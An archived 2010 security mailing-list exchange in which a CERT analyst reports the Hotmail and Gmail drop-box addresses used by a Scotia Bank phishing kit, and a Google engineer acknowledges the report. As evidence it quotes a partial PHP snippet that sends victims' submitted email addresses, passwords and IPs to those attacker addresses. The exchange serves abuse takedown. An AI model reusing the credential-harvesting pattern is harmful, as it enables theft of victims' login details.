[nsp-sec] phishing dropboxes at gmail.com / hotmail.com
Peter Moody
pmoody at google.com
Wed Nov 3 13:46:55 EDT 2010
ack.
On Wed, Nov 3, 2010 at 10:35 AM, Rodolfo Baader <rbaader at arcert.gov.ar>wrote:
> ----------- nsp-security Confidential --------
>
> Hi!
>
> while investigating a phishing case, we've found the followings drop boxes:
> hotmail -> "anny_cole1 at hotmail.com"
> gmail -> "talk2booss at gmail.com"
>
>
> Evidence:
>
> ==============================================================================
> (...)
> $message .= "Email Address: ".$_POST['email']."\n";
> $message .= "Email Password: ".$_POST['pass']."\n";
> $message .= "IP: ".$ip."\n";
> $message .= "-------GreenChiefO-------\n";
> $recipient = "anny_cole1 at hotmail.com,talk2booss at gmail.com";
> $subject = "Scotia Bank";
> $headers = "Scotia";
> (...)
>
>
> ==============================================================================
>
> Regards,
> R.
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>
--
Peter Moody Google 1.650.253.7306
Network Security Engineer pgp:0xC3410038
More information about the nsp-security
mailing list